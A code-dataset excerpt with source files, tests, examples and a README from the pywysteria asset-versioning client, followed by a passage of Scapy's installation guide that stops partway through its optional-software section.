self.client.create_collection(_rs())\n self.client.create_collection(_rs())\n\n # act\n iresult = self.client.get_collection(col.id)\n nresult = self.client.get_collection(col.name)\n\n # assert\n assert col == iresult\n assert col == nresult\n" }, { "alpha_fraction": 0.5175155401229858, "alphanum_fraction": 0.5285714268684387, "avg_line_length": 26.380952835083008, "blob_id": "5a46c19893715f1a83de87f9078b7830018fa77f", "content_id": "d2f2801b2752956e3d17ece669eef11274cb544f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8050, "license_type": "permissive", "max_line_length": 88, "num_lines": 294, "path": "/tests/integration/tests/domain/item_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport random\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestItem:\n \"\"\"Tests for the item class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_create_version_itterates_versions_by_item(self):\n \"\"\"Each item has it's own highest version number\"\"\"\n # arrange\n item1 = self.collection.create_item(_rs(), _rs())\n item2 = self.collection.create_item(_rs(), _rs())\n item1_version_numbers = [1, 2, 3]\n item2_version_numbers = [1, 2]\n\n # act\n versions1 = [\n item1.create_version(),\n item1.create_version(),\n item1.create_version(),\n ]\n versions2 = [\n item2.create_version(),\n item2.create_version(),\n ]\n\n # assert\n assert item1_version_numbers == [v.version for v in versions1]\n assert item2_version_numbers == [v.version for v in versions2]\n\n for v in versions1:\n assert v not in versions2\n for v in versions2:\n assert v not in versions1\n\n def test_publish_version_sets_given_version_as_published(self):\n \"\"\"Regardless of what version is published, get_published() should return it.\n\n That is, it's perfectly acceptable to have versions 1-100, but have version 5 as\n the published one.\n \"\"\"\n # arrange\n item = self.collection.create_item(_rs(), _rs())\n versions = [\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n ]\n\n for i in range(0, 20):\n pver = random.choice(versions)\n\n # act\n pver.publish()\n\n # assert\n result = item.get_published()\n assert result == pver\n\n def test_update_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n item = self.collection.create_item(_rs(), _rs())\n\n # act\n item.update_facets(**facets)\n remote = self.client.get_item(item.id)\n\n # assert\n for k, v in facets.items():\n assert item.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_version_itterates_versions(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n item = self.collection.create_item(_rs(), _rs())\n expect_version_numbers = [1, 2, 3, 4, 5]\n\n # act\n versions = [\n item.create_version(facets),\n item.create_version(facets),\n item.create_version(facets),\n item.create_version(facets),\n item.create_version(facets),\n ]\n\n numbers = [v.version for v in 
versions]\n\n        # assert\n        assert numbers == expect_version_numbers\n        for ver in versions:\n            assert ver.parent == item.id\n            for k, v in facets.items():\n                assert ver.facets[k] == v\n\n    def test_duplicate_item_different_parent_doesnt_raise(self):\n        # arrange\n        type_ = _rs()\n        variant = _rs()\n\n        self.collection.create_item(type_, variant)\n        another_collection = self.client.create_collection(_rs())\n\n        # act\n        another_collection.create_item(type_, variant)\n\n        # assert\n        assert True\n\n    def test_duplicate_item_raises(self):\n        # arrange\n        type_ = _rs()\n        variant = _rs()\n\n        self.collection.create_item(type_, variant)\n\n        # act & assert\n        with pytest.raises(wysteria.errors.AlreadyExistsError):\n            self.collection.create_item(type_, variant)\n\n    def test_link_items(self):\n        # arrange\n        self.collection.create_item(_rs(), _rs())\n\n        # Desired link pattern\n        #\n        #          +---[foo]---> item2\n        #  item1----|\n        #          +---[foo]---> item3\n        #\n        #\n        #  item(2/3) ----[bar]---> item1\n        #\n        item1 = self.collection.create_item(_rs(), _rs())\n        item2 = self.collection.create_item(_rs(), _rs())\n        item3 = self.collection.create_item(_rs(), _rs())\n\n        # act\n        item1_link_name = \"foo\"\n        item1.link_to(item1_link_name, item2)\n        item1.link_to(item1_link_name, item3)\n\n        item23_link_name = \"bar\"\n        item2.link_to(item23_link_name, item1)\n        item3.link_to(item23_link_name, item1)\n\n        # assert\n        item1_linked = item1.get_linked()\n        item2_linked = item2.get_linked()\n\n        assert isinstance(item1_linked, dict)\n        assert isinstance(item2_linked, dict)\n\n        assert item1_link_name in item1_linked\n        for l in item1_linked.get(item1_link_name, []):\n            assert l in [item2, item3]\n\n        assert item23_link_name in item2_linked\n        assert item2_linked.get(item23_link_name, []) == [item1]\n\n    def test_delete_item(self):\n        # arrange\n        item = self.collection.create_item(_rs(), _rs())\n\n        # act\n        item.delete()\n        remote = self.client.get_item(item.id)\n\n        # assert\n        assert not remote\n\n    def test_find_item_by_facets(self):\n        # arrange\n        facets = {\"fofofofooitems\": _rs()}\n        expected = [\n            self.collection.create_item(_rs(), _rs(), facets=facets),\n            self.collection.create_item(_rs(), _rs(), facets=facets),\n        ]\n        not_expected = [self.collection.create_item(_rs(), _rs())]\n\n        s = self.client.search()\n        s.params(facets=facets)\n\n        # act\n        results = s.find_items(limit=10)\n\n        # assert\n        assert len(results) == len(expected)\n        for r in results:\n            assert r in expected\n            assert r not in not_expected\n\n    def test_find_item_by_variant(self):\n        # arrange\n        variant = _rs()\n        expected = [\n            self.collection.create_item(_rs(), variant),\n            self.collection.create_item(_rs(), variant),\n        ]\n        not_expected = [self.collection.create_item(_rs(), _rs())]\n\n        s = self.client.search()\n        s.params(item_variant=variant)\n\n        # act\n        results = s.find_items(limit=10)\n\n        # assert\n        assert len(results) == len(expected)\n        for r in results:\n            assert r in expected\n            assert r not in not_expected\n\n    def test_find_item_by_type(self):\n        # arrange\n        type_ = _rs()\n        expected = [\n            self.collection.create_item(type_, _rs()),\n            self.collection.create_item(type_, _rs()),\n        ]\n        not_expected = [self.collection.create_item(_rs(), _rs())]\n\n        s = self.client.search()\n        s.params(item_type=type_)\n\n        # act\n        results = s.find_items(limit=10)\n\n        # assert\n        assert len(results) == len(expected)\n        for r in results:\n            assert r in expected\n            assert r not in not_expected\n\n    def test_create_item(self):\n        # arrange\n        facets = {\n            \"awesomefoo\": _rs(),\n            \"awesomebar\": _rs(),\n        }\n\n        # act\n        item = 
self.collection.create_item(_rs(), _rs(), facets=facets)\n ritem = self.client.get_item(item.id)\n\n # assert\n assert item\n assert ritem\n assert item == ritem\n assert item.id\n assert ritem.id\n assert item.uri\n assert ritem.uri\n for k, v in facets.items():\n assert item.facets[k] == v\n assert ritem.facets[k] == v\n" }, { "alpha_fraction": 0.49339935183525085, "alphanum_fraction": 0.5082508325576782, "avg_line_length": 22.30769157409668, "blob_id": "3c034edd213e25d058f7393d760b41b014947281", "content_id": "8778cbb3e999cb7e27360bced64c43fa10f71790", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3636, "license_type": "permissive", "max_line_length": 62, "num_lines": 156, "path": "/tests/integration/tests/domain/version_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestVersion:\n \"\"\"Tests for the Version class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n cls.item = cls.collection.create_item(_rs(), _rs())\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_delete_version(self):\n # arrange\n version = self.item.create_version()\n s = self.client.search()\n s.params(id=version.id)\n\n # act\n version.delete()\n remote = s.find_versions(limit=1)\n\n # assert\n assert not remote\n\n def test_resources_are_deleted_when_version_deleted(self):\n # arrange\n v = self.item.create_version()\n\n r1 = v.add_resource(_rs(), _rs(), _rs())\n r2 = v.add_resource(_rs(), _rs(), _rs())\n\n s = self.client.search()\n s.params(id=r1.id)\n s.params(id=r2.id)\n\n # act\n v.delete()\n\n results = s.find_resources(limit=3)\n\n # assert\n assert not results\n\n def test_link_versions(self):\n # arrange\n\n # Desired link pattern\n #\n # +---[foo]---> v2\n # v1----|\n # +---[foo]---> v3\n #\n #\n # v(2/3) ----[bar]---> v1\n #\n v1 = self.item.create_version()\n v2 = self.item.create_version()\n v3 = self.item.create_version()\n\n # act\n v1_link_name = \"foo\"\n v1.link_to(v1_link_name, v2)\n v1.link_to(v1_link_name, v3)\n\n v23_link_name = \"bar\"\n v2.link_to(v23_link_name, v1)\n v3.link_to(v23_link_name, v1)\n\n # assert\n v1_linked = v1.get_linked()\n v2_linked = v2.get_linked()\n\n assert isinstance(v1_linked, dict)\n assert isinstance(v2_linked, dict)\n\n assert v1_link_name in v1_linked\n for l in v1_linked.get(v1_link_name, []):\n assert l in [v2, v3]\n\n assert v23_link_name in v2_linked\n assert v2_linked.get(v23_link_name, []) == [v1]\n\n def _single_version(self, id_):\n \"\"\"Return a single version by Id\n\n Args:\n id_:\n\n Returns:\n Version\n \"\"\"\n s = self.client.search()\n s.params(id=id_)\n result = s.find_versions(limit=1)\n assert result\n return result[0]\n\n def test_update_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n version = self.item.create_version()\n\n # act\n version.update_facets(**facets)\n remote = self._single_version(version.id)\n\n # assert\n assert version\n assert remote\n assert version == remote\n for k, v in facets.items():\n assert version.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_version_sets_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n version = 
self.item.create_version(facets)\n remote = self._single_version(version.id)\n\n # assert\n assert version\n assert remote\n assert version == remote\n assert version.id\n assert version.uri\n assert remote.id\n assert remote.uri\n for k, v in facets.items():\n assert version.facets[k] == v\n assert remote.facets[k] == v\n" }, { "alpha_fraction": 0.587597668170929, "alphanum_fraction": 0.5888580679893494, "avg_line_length": 25.804054260253906, "blob_id": "884b4b448d5324073bf893c02386efd7efe203fa", "content_id": "7b591e57c11335484afa39db83f61a5c9695f382", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3967, "license_type": "permissive", "max_line_length": 84, "num_lines": 148, "path": "/wysteria/client.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nfrom copy import copy\n\nfrom wysteria.middleware import NatsMiddleware\nfrom wysteria.middleware import GRPCMiddleware\nfrom wysteria import constants as consts\nfrom wysteria.errors import UnknownMiddlewareError\nfrom wysteria.domain import Collection, QueryDesc\nfrom wysteria.search import Search\n\n\n_KEY_MIDDLEWARE_NATS = \"nats\"\n_KEY_MIDDLEWARE_GRPC = \"grpc\"\n_AVAILABLE_MIDDLEWARES = {\n _KEY_MIDDLEWARE_NATS: NatsMiddleware,\n _KEY_MIDDLEWARE_GRPC: GRPCMiddleware,\n}\n_DEFAULT_MIDDLEWARE = _KEY_MIDDLEWARE_GRPC\n\n\nclass Client:\n \"\"\"WysteriaClient wraps a middleware class and provides convenience.\n\n Although technically the middleware could be used directly, this\n client allows us to alter the middleware later on without needing to change\n anything client facing.\n\n \"\"\"\n\n def __init__(self, url=None, middleware=_KEY_MIDDLEWARE_NATS, tls=None):\n \"\"\"\n\n Args:\n url (str):\n middleware (str): the name of an available middleware\n tls: a named tuple of our tls options (see utils.py)\n\n \"\"\"\n cls = _AVAILABLE_MIDDLEWARES.get(middleware.lower())\n if not cls:\n raise UnknownMiddlewareError(\"Unknown middleware '%s'\" % middleware)\n\n self._conn = cls(url=url, tls=tls)\n\n def connect(self):\n \"\"\"Connect to wysteria - used if you do not wish to use 'with'\n \"\"\"\n self._conn.connect()\n\n def close(self):\n \"\"\"Disconnect from wysteria - used if you do not wish to use 'with'\n \"\"\"\n try:\n self._conn.close()\n except Exception:\n pass # prevent the middleware from raising when we call close on it\n\n def __enter__(self):\n \"\"\"Connect to remote host(s)\"\"\"\n self.connect()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"Close connection(s) to remote host\"\"\"\n self.close()\n\n def search(self):\n \"\"\"Start a new search\n\n Returns:\n wysteria.Search\n \"\"\"\n return Search(self._conn)\n\n @property\n def default_middleware(self) -> str:\n \"\"\"Return the default middleware name\n\n Returns:\n str\n \"\"\"\n return _DEFAULT_MIDDLEWARE\n\n @staticmethod\n def available_middleware() -> list:\n \"\"\"Return a list of the available middleware\n\n Returns:\n []str\n \"\"\"\n return list(_AVAILABLE_MIDDLEWARES.keys())\n\n def create_collection(self, name: str, facets: dict=None):\n \"\"\"Create a collection with the given name.\n\n Note: Only one collection is allowed with a given name.\n\n Args:\n name (str): name for new collection\n facets (dict): facets to set on new collection\n\n Returns:\n domain.Collection\n \"\"\"\n cfacets = copy(facets)\n if not cfacets:\n cfacets = {}\n\n cfacets[consts.FACET_COLLECTION] = cfacets.get(consts.FACET_COLLECTION, \"/\")\n\n c = 
Collection(self._conn, name=name, facets=cfacets)\n c._id = self._conn.create_collection(c)\n return c\n\n def get_collection(self, identifier):\n \"\"\"Find a collection by either name or id\n\n Args:\n identifier (str): either the name or id of the desired collection\n\n Returns:\n domain.Collection or None\n \"\"\"\n result = self._conn.find_collections([\n QueryDesc().id(identifier),\n QueryDesc().name(identifier),\n QueryDesc().uri(identifier),\n ], limit=2)\n if (not result) or len(result) > 1:\n return None\n return result[0]\n\n def get_item(self, item_id):\n \"\"\"Find & return an item by its ID\n\n Args:\n item_id (str):\n\n Returns:\n domain.Item or None\n \"\"\"\n result = self._conn.find_items([\n QueryDesc().id(item_id),\n ], limit=1)\n if not result:\n return None\n return result[0]\n" }, { "alpha_fraction": 0.5601651072502136, "alphanum_fraction": 0.5614035129547119, "avg_line_length": 29.471698760986328, "blob_id": "9909eace65c93ec998a98d3b06c0f005552e8bdd", "content_id": "b55642872d69158a68544c8b638e14a4f521bc25", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4845, "license_type": "permissive", "max_line_length": 80, "num_lines": 159, "path": "/wysteria/search.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "from wysteria.domain import QueryDesc\nfrom wysteria.constants import DEFAULT_QUERY_LIMIT\n\n\nclass Search(object):\n \"\"\"The search object is used to build a query to send to wysteria.\n \"\"\"\n\n def __init__(self, conn):\n self._conn = conn\n self._query = []\n\n def params(\n self,\n id: str=\"\",\n uri: str=\"\",\n name: str=\"\",\n parent: str=\"\",\n version_number: int=0,\n item_type: str=\"\",\n item_variant: str=\"\",\n facets: dict=None,\n resource_type: str=\"\",\n resource_location: str=\"\",\n link_source: str=\"\",\n link_destination: str=\"\"\n ):\n \"\"\"Append the given query description to the query we're going to\n launch. 
Objects returned will be required to match all of the terms\n specified on at least one of the query description objects.\n\n That is, the terms on each individual QueryDesc obj are considered \"AND\"\n and each QueryDesc in a list of QueryDesc objs are considered \"OR\" when\n taken together.\n\n Args:\n id (str):\n uri (str):\n name (str):\n parent (str):\n version_number (int):\n item_type (str):\n item_variant (str):\n facets (dict):\n resource_type (str):\n resource_location (str):\n link_source (str):\n link_destination (str):\n\n Returns:\n bool\n \"\"\"\n if not facets:\n facets = {}\n\n qd = QueryDesc()\\\n .id(id)\\\n .uri(uri)\\\n .name(name)\\\n .parent(parent)\\\n .version_number(version_number)\\\n .item_type(item_type)\\\n .item_variant(item_variant)\\\n .has_facets(**facets)\\\n .resource_type(resource_type)\\\n .resource_location(resource_location)\\\n .link_source(link_source)\\\n .link_destination(link_destination)\n\n self._query.append(qd)\n return self\n\n def _generic_run_query(self, find_func, limit: int, offset: int):\n \"\"\"Run the built query and return matching collections\n\n Returns:\n []domain.?\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return find_func(self._query, limit=limit, offset=offset)\n\n def find_collections(self, limit: int=DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching collections\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Collection\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(\n self._conn.find_collections, limit, offset\n )\n\n def find_items(self, limit: int=DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching items\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Item\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_items, limit, offset)\n\n def find_versions(self, limit:int =DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching versions\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Version\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_versions, limit, offset)\n\n def find_resources(self, limit:int =DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching resources\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Resource\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_resources, limit, offset)\n\n def find_links(self, limit:int =DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching links\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Link\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(self._conn.find_links, limit, offset)\n" }, { "alpha_fraction": 0.601123571395874, "alphanum_fraction": 0.6048688888549805, "avg_line_length": 22.217391967773438, "blob_id": "8df5feb595c0627a7ab46254d73368e1380dd563", "content_id": 
"1d38df9e5920a38c11934f96f80fcb88165d200e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "permissive", "max_line_length": 80, "num_lines": 23, "path": "/examples/07/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample07: Search everything\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n search.params()\n\n # Although generally not good practice, we don't have to give query args\n # Most likely one should use pagination here!\n # Also note, the server does hard limit the number of results returned\n # by such 'match all' queries ..\n for c in search.find_collections():\n print(c)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6520775556564331, "alphanum_fraction": 0.6664819717407227, "avg_line_length": 23.72602653503418, "blob_id": "b78d3bd49a5ca1f8f01c599c8fa8b83c678e70af", "content_id": "b91bd4c1863a45a2ebbdbfa502ff6f57163e1e86", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1805, "license_type": "permissive", "max_line_length": 119, "num_lines": 73, "path": "/README.md", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "# pywysteria\n\nPython3 client for open source asset versioning and publishing system [wysteria](https://github.com/voidshard/wysteria)\n\n\n### Basic Usage\n##### Creating, publishing, linking\n```python\n\nimport wysteria\n\n# connect\nclient = wysteria.Client()\n \nwith client:\n # create collection named \"tiles\" \n tiles = client.create_collection(\"tiles\")\n \n # create sub item for an oak tree\n oak = tiles.create_item(\"tree\", \"oak\")\n \n # create the next version (#1)\n oak01 = oak.create_version()\n\n # add some resources to our new version\n oak01.add_resource(\"default\", \"png\", \"url://images/oak01.png\")\n oak01.add_resource(\"stats\", \"xml\", \"/path/to/file.xml\")\n\n # create a pine item, version & resource\n pine = tiles.create_item(\"tree\", \"pine\")\n pine01 = pine.create_version({\"foo\": \"bar\"})\n pine01.add_resource(\"default\", \"png\", \"/path/to/pine01.png\")\n\n # mark these as published\n oak01.publish()\n pine01.publish()\n\n # create the next \n oas02 = oak.create_version()\n \n # link our tree versions to each other\n oak01.link_to(\"foobar\", pine01)\n``` \n\n##### Searching\n```python\nimport wysteria\n\n# connect\nclient = wysteria.Client()\n \nwith client:\n # create new search object\n search = client.search()\n\n # set some params to search for\n search.params(item_type=\"tree\", item_variant=\"oak\")\n\n # find any & all matching items\n print(\"Items of type 'tree' and variant 'oak'\")\n items = search.find_items()\n```\n\nFor more & more complicated examples please see the examples folder. 
\n\nMore information available over on the main repo for [wysteria](https://github.com/voidshard/wysteria)\n\n\n\n#### Requires\n\n- Nats client: https://github.com/nats-io/asyncio-nats\n- Config file parser: https://pypi.python.org/pypi/configparser\n" }, { "alpha_fraction": 0.6071133017539978, "alphanum_fraction": 0.6129032373428345, "avg_line_length": 19.491525650024414, "blob_id": "4854ce6211cf2df444bea99687702a8c05a366e2", "content_id": "a755c9171206d7af6f633abec0a8e1808f8b9b78", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1209, "license_type": "permissive", "max_line_length": 94, "num_lines": 59, "path": "/tests/integration/run.sh", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#\n# Integration test suite launcher.\n#\n# You'll want to make sure you build the appropriate docker images first (build scripts are in\n# the main Go repo) wysteria/docker/images/\n#\n# These tests explicitly check network functions & compatibility with the server build(s).\n#\n\n# set fail on error\nset -eu\n\n\n# ------------------ globals\nDIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\nSLEEP_TIME=2\nPYTHON=python3.6\nTEST_DIR=${DIR}\"/tests\"\nPY_DIR=${DIR}\"/../../\"\n# ------------------\n\n\n# add local wysteria python lib to the python path\nexport PYTHONPATH=${PY_DIR}:${PYTHONPATH}\n\n# ------------------ functions\ndotest () {\n # Args:\n # (1) service to launch (as defined in docker-compose)\n\n echo \"> running test:\" $1\n\n docker-compose up -d $1\n\n # sleep for a bit to allow things to start up\n sleep ${SLEEP_TIME}\n\n # permit failures\n set +e\n\n # throw it over to pytest\n ${PYTHON} -m pytest ${TEST_DIR} -vvs\n\n # set fail on error\n set -eu\n\n docker-compose down\n}\n# ------------------\n\n\n# ------------------ start\nexport WYSTERIA_CLIENT_INI=test-nats.ini\ndotest \"local_wysteria_nats\"\n\nexport WYSTERIA_CLIENT_INI=test-grpc.ini\ndotest \"local_wysteria_grpc\"\n" }, { "alpha_fraction": 0.5089722871780396, "alphanum_fraction": 0.5375204086303711, "avg_line_length": 23.039215087890625, "blob_id": "e794d0fad56abb580f8179cd0cb2c0543969161a", "content_id": "6e66ce6a382bae5aa08ab8638a9e919919be673f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1226, "license_type": "permissive", "max_line_length": 55, "num_lines": 51, "path": "/examples/01/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample01: Creating, publishing & linking\n (Created objects here are used in following examples)\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n tiles = client.create_collection(\"tiles\")\n oak = tiles.create_item(\"tree\", \"oak\")\n oak01 = oak.create_version()\n\n oak01.add_resource(\n \"default\", \"png\", \"url://images/oak01.png\"\n )\n oak01.add_resource(\n \"stats\", \"xml\", \"/path/to/file.xml\"\n )\n\n pine = tiles.create_item(\"tree\", \"pine\")\n pine01 = pine.create_version({\"foo\": \"bar\"})\n pine01.add_resource(\n \"default\", \"png\", \"/path/to/pine01.png\"\n )\n\n maps = client.create_collection(\"maps\")\n forest = maps.create_item(\"2dmap\", \"forest\")\n forest01 = forest.create_version()\n\n oak01.publish()\n pine01.publish()\n\n forest01.link_to(\"input\", oak01)\n forest01.link_to(\"input\", pine01)\n\n print(\"--collections\")\n print(forest)\n print(tiles)\n print(\"--items--\")\n 
print(oak)\n print(pine)\n print(\"--versions--\")\n print(oak01)\n print(pine01)\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
37
jreynders/BLESuite-1
https://github.com/jreynders/BLESuite-1
758404823c71fb15ff8326a5611aed742065bda4
8335d47d76919b79f00cea72a1e58524f3440826
8191c12eb7ebd4296b4e5d35e7de9b53bc767a5a
refs/heads/master
2023-02-20T22:21:35.891269
2022-11-08T22:09:06
2022-11-08T22:09:06
168,422,668
0
0
MIT
2019-01-30T22:04:54
2022-11-08T22:09:15
2023-02-08T20:01:17
Python
[ { "alpha_fraction": 0.6896284818649292, "alphanum_fraction": 0.7016898989677429, "avg_line_length": 34.39725875854492, "blob_id": "f7b82c74df10fe30c86c8d2cda6a689ffc8c9d56", "content_id": "91e72800c6aab0525870644f915aaa153d800cb9", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 15504, "license_type": "permissive", "max_line_length": 410, "num_lines": 438, "path": "/scapy/doc/scapy/installation.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": ".. highlight:: sh\n\n*************************\nDownload and Installation\n*************************\n\nOverview\n========\n\n 0. Install `Python 2.7.X or 3.4+ <https://www.python.org/downloads/>`_.\n 1. `Download and install Scapy. <#installing-scapy-v2-x>`_\n 2. `Follow the platform-specific instructions (depedencies) <#platform-specific-instructions>`_.\n 3. (Optional): `Install additional software for special features <#optional-software-for-special-features>`_.\n 4. Run Scapy with root privileges.\n \nEach of these steps can be done in a different way depending on your platform and on the version of Scapy you want to use. \n\nAt the moment, there are two different versions of Scapy:\n\n* **Scapy v2.x**. The current up-to-date version. It consists of several files packaged in the standard distutils way.\n Scapy v2 <= 2.3.3 needs Python 2.5, Scapy v2 > 2.3.3 needs Python 2.7 or 3.4+.\n* **Scapy v1.x (deprecated)**. It does not support Python 3. It consists of only one file and works on Python 2.4, so it might be easier to install.\n Moreover, your OS may already have specially prepared packages or ports for it. The last version is v1.2.2.\n\n.. note::\n\n In Scapy v2 use ``from scapy.all import *`` instead of ``from scapy import *``.\n\n\nInstalling Scapy v2.x\n=====================\n\nThe following steps describe how to install (or update) Scapy itself.\nDependent on your platform, some additional libraries might have to be installed to make it actually work. \nSo please also have a look at the platform specific chapters on how to install those requirements.\n\n.. note::\n\n The following steps apply to Unix-like operating systems (Linux, BSD, Mac OS X). \n For Windows, see the `special chapter <#windows>`_ below.\n\nMake sure you have Python installed before you go on.\n\nLatest release\n--------------\n\n.. note::\n To get the latest versions, with bugfixes and new features, but maybe not as stable, see the `development version <#current-development-version>`_.\n\nUse pip::\n\n$ pip install scapy\n\n\nYou can also download the `latest version <https://github.com/secdev/scapy/archive/master.zip>`_ to a temporary directory and install it in the standard `distutils <http://docs.python.org/inst/inst.html>`_ way::\n\n$ cd /tmp\n$ wget --trust-server-names https://github.com/secdev/scapy/archive/master.zip # or wget -O master.zip https://github.com/secdev/scapy/archive/master.zip\n$ unzip master.zip\n$ cd master\n$ sudo python setup.py install\n \nCurrent development version\n----------------------------\n\n.. index::\n single: Git, repository\n\nIf you always want the latest version with all new features and bugfixes, use Scapy's Git repository:\n\n1. Install the Git version control system. For example, on Debian/Ubuntu use::\n\n $ sudo apt-get install git\n\n or on OpenBSD:: \n \n $ doas pkg_add git\n\n2. 
Check out a clone of Scapy's repository::\n \n $ git clone https://github.com/secdev/scapy\n \n3. Install Scapy in the standard distutils way:: \n \n $ cd scapy\n $ sudo python setup.py install\n \nThen you can always update to the latest version::\n\n $ git pull\n $ sudo python setup.py install\n\n.. note::\n\n You can run scapy without installing it using the ``run_scapy`` (unix) or ``run_scapy.bat`` (Windows) script or running it directly from the executable zip file (see the previous section).\n\nInstalling Scapy v1.2 (Deprecated)\n==================================\n\nAs Scapy v1 consists only of one single Python file, installation is easy:\nJust download the last version and run it with your Python interpreter::\n\n $ wget https://raw.githubusercontent.com/secdev/scapy/v1.2.0.2/scapy.py\n $ sudo python scapy.py\n\nOptional software for special features\n======================================\n\nFor some special features, you have to install more software. \nMost of those software are installable via ``pip``.\nHere are the topics involved and some examples that you can use to try if your installation was successful.\n\n.. index::\n single: plot()\n\n* Plotting. ``plot()`` needs `Matplotlib <https://matplotlib.org/>`_. It is installable via ``pip install matplotlib``\n \n .. code-block:: python\n \n >>> p=sniff(count=50)\n >>> p.plot(lambda x:len(x))\n \n* 2D graphics. ``psdump()`` and ``pdfdump()`` need `PyX <http://pyx.sourceforge.net/>`_ which in turn needs a LaTeX distribution: `texlive (Unix) <http://www.tug.org/texlive/>`_ or `MikTex (Windows) <https://miktex.org/>`_.\n \n Note: PyX requires version 0.12.1 on Python 2.7. This means that on Python 2.7, it needs to be installed via ``pip install pyx==0.12.1``. Otherwise ``pip install pyx``\n \n .. code-block:: python\n \n >>> p=IP()/ICMP()\n >>> p.pdfdump(\"test.pdf\") \n \n* Graphs. ``conversations()`` needs `Graphviz <http://www.graphviz.org/>`_ and `ImageMagick <http://www.imagemagick.org/>`_.\n \n .. code-block:: python\n\n >>> p=readpcap(\"myfile.pcap\")\n >>> p.conversations(type=\"jpg\", target=\"> test.jpg\")\n \n* 3D graphics. ``trace3D()`` needs `VPython <http://www.vpython.org/>`_.\n \n .. code-block:: python\n\n >>> a,u=traceroute([\"www.python.org\", \"google.com\",\"slashdot.org\"])\n >>> a.trace3D()\n\n.. index::\n single: WEP, unwep()\n\n* WEP decryption. ``unwep()`` needs `cryptography <https://cryptography.io>`_. Example using a `Weplap test file 